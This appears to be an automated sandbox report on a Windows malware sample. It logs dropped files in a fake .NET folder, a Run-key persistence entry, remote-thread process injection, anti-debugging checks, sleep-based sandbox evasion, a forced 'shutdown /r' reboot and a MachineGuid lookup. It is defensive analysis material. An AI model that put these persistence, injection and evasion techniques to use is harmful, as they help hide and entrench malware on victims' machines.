Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: leg#U00edvel9931-009-140.08372236.exe

Static file information: File size 11252752 > 1048576

Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x272c00
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x28e400

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr

Source:

Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr

Data Obfuscation

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,

6_2_00007FF6B40A1000

Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: .xdata
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /4
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /19
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /32
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /46
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /65
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /78
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /90
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: .symtab

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	File created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIE_64.exe			Jump to dropped file
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	File created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy)			Jump to dropped file
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	File created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIEDLL_64.dll			Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ng3DJyCjjqIdyv			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ng3DJyCjjqIdyv			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180037F9C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_0000000180037F9C

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Window / User API: threadDelayed 5032			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Window / User API: threadDelayed 1590			Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	API coverage: 6.5 %
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	API coverage: 1.2 %

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 2000	Thread sleep time: -5032000s >= -30000s			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 5600	Thread sleep time: -3432000s >= -30000s			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 4632	Thread sleep time: -1428000s >= -30000s			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 6020	Thread sleep time: -1590000s >= -30000s			Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A528EDC FindFirstFileExW,		6_2_00007FFE1A528EDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180055750 FindFirstFileExW,		6_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180055750 FindFirstFileExW,		7_2_0000000180055750

Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1984599299.00000232A23C2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A31EC RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_00007FF6B40A31EC

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,

6_2_00007FF6B40A1000

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FFE1A511800 SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualFree,SetLastError,VirtualFree,VirtualFree,VirtualFree,SetLastError,VirtualAlloc,SetLastError,SetLastError,

6_2_00007FFE1A511800

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A31EC RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_00007FF6B40A31EC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A1840 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_00007FF6B40A1840
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A3874 SetUnhandledExceptionFilter,		6_2_00007FF6B40A3874
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A94B8 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_00007FF6B40A94B8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A517ABC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_00007FFE1A517ABC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A51EB04 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_00007FFE1A51EB04
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A517360 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_00007FFE1A517360
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018003924C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		6_2_000000018003924C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180041394 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_0000000180041394
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180039820 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_0000000180039820
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018003924C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_000000018003924C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180041394 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		7_2_0000000180041394
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180039820 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		7_2_0000000180039820

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,

6_2_00007FF6B40A1000

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,

6_2_00007FF6B40A1000

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180006380 GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,mouse_event,mouse_event,Sleep,mouse_event,GetSystemMetrics,GetSystemMetrics,mouse_event,Sleep,

6_2_0000000180006380

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30

Jump to behavior

Language, Device and Operating System Detection

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FFE1A531F20 cpuid

6_2_00007FFE1A531F20

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoA,		6_2_00007FF6B40A8FF0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,		6_2_00007FFE1A52E268
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		6_2_00007FFE1A52EACC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,		6_2_00007FFE1A52EB7C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,		6_2_00007FFE1A528048
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,		6_2_00007FFE1A52E974
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,		6_2_00007FFE1A52E694
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,		6_2_00007FFE1A52E72C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		6_2_00007FFE1A52ECB0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,		6_2_00007FFE1A527CB4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,		6_2_00007FFE1A52E5C4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		6_2_000000018005B000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,		6_2_000000018005B0B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		6_2_000000018005B1DC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: try_get_function,GetLocaleInfoW,		6_2_000000018004F34C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,		6_2_000000018005A7A8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,		6_2_000000018005AAF4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,		6_2_000000018005ABC4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,		6_2_000000018005AC5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,		6_2_000000018004ED7C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,		6_2_000000018005AEA8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		7_2_000000018005B000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,		7_2_000000018005B0B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,		7_2_000000018005B1DC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: try_get_function,GetLocaleInfoW,		7_2_000000018004F34C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,		7_2_000000018005A7A8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,		7_2_000000018005AAF4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,		7_2_000000018005ABC4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,		7_2_000000018005AC5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,		7_2_000000018004ED7C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,		7_2_000000018005AEA8

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Queries volume information: C:\Users\user\Microsoft.NET\netframework4.7\version\ng3DJyCjjqIdyv.zip VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Queries volume information: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas VolumeInformation			Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A4AB4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

6_2_00007FF6B40A4AB4

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00000001800502BC _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

6_2_00000001800502BC

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior